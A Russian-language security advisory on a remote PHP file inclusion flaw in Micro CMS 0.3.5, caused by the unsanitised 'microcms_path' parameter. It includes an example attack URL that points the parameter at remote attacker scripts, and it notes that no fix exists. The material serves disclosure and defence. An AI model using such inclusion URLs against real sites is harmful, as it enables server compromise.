PHP-инклюдинг в Micro CMS

Дата публикации:
29.06.2006
Дата изменения:
17.10.2006
Всего просмотров:
1594
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Micro CMS 3.x
Уязвимые версии: Micro CMS 0.3.5, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "microcms_path" в сценарии microcms-include.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://target/micro_cms_path/micro_cms_files/microcms-include.php?microcms_path=[evil scripts]

URL производителя: www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Micro CMS <= 0.3.5 (microcms_path) Remote File Include Vulnerability

или введите имя

CAPTCHA